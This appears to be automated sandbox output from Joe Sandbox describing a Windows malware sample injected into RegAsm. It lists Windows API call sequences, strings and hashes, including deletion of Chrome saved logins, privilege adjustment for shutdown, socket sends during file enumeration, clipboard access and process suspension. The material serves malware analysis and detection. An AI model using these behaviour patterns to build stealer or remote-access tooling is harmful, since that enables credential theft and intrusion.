                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                          • API String ID: 1589313981-2876530381
                                                          • Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                          • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                          • Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                          • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                          • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP$['E
                                                          • API String ID: 2299586839-2532616801
                                                          • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                          • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                          • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                          • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                          • GetLastError.KERNEL32 ref: 0040BA58
                                                          Strings
                                                          • UserProfile, xrefs: 0040BA1E
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                          • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          • API String ID: 2018770650-1062637481
                                                          • Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                          • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                          • Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                          • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                          • GetLastError.KERNEL32 ref: 0041799D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3534403312-3733053543
                                                          • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                          • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                          • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                          • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00409258
                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00AB4960,00000010), ref: 004048E0
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                          • FindClose.KERNEL32(00000000), ref: 004093C1
                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                          • FindClose.KERNEL32(00000000), ref: 004095B9
                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                          • String ID:
                                                          • API String ID: 1824512719-0
                                                          • Opcode ID: 4482e2d46faa48bed4d95b0ef594fdf0c4940ac564eca0a7797fa75c5abd493a
                                                          • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                          • Opcode Fuzzy Hash: 4482e2d46faa48bed4d95b0ef594fdf0c4940ac564eca0a7797fa75c5abd493a
                                                          • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          • API String ID: 276877138-0
                                                          • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                          • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                          • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                          • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                          APIs
                                                          • FindResourceA.KERNEL32 ref: 0041B4B9
                                                          • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                          • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                          • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                          • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                          • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                          • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040966A
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          • Opcode ID: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                                                          • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                          • Opcode Fuzzy Hash: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                                                          • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408811
                                                          • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                          • String ID:
                                                          • API String ID: 1771804793-0
                                                          • Opcode ID: b567b387b19c3842d3e3fd3ce298d840e85eb04b560dfe416f5b5c0f2df3b91c
                                                          • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                          • Opcode Fuzzy Hash: b567b387b19c3842d3e3fd3ce298d840e85eb04b560dfe416f5b5c0f2df3b91c
                                                          • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstNextsend
                                                          • String ID: XPG$XPG
                                                          • API String ID: 4113138495-1962359302
                                                          • Opcode ID: 7e33203509aae693cc89a0e1f496922fc68c0ad59341bfee28e2f25de675e589
                                                          • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                          • Opcode Fuzzy Hash: 7e33203509aae693cc89a0e1f496922fc68c0ad59341bfee28e2f25de675e589
                                                          • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                          • String ID: sJD
                                                          • API String ID: 1661935332-3536923933
                                                          • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                          • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                          • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                          • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                          • String ID:
                                                          • API String ID: 2829624132-0
                                                          • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                          • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                          • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                          • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                          • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                          • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                          • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                          • ExitProcess.KERNEL32 ref: 10004AEE
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                                          • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                                          • ExitProcess.KERNEL32 ref: 004432EF
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                          • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                          • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                          • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseDataOpen
                                                          • String ID:
                                                          • API String ID: 2058664381-0
                                                          • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                          • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                          • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                          • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BB2A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenSuspend
                                                          • String ID:
                                                          • API String ID: 1999457699-0
                                                          • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                          • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                                          • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                          • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BB56
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenResume
                                                          • String ID:
                                                          • API String ID: 3614150671-0
                                                          • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                          • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                                          • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                          • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
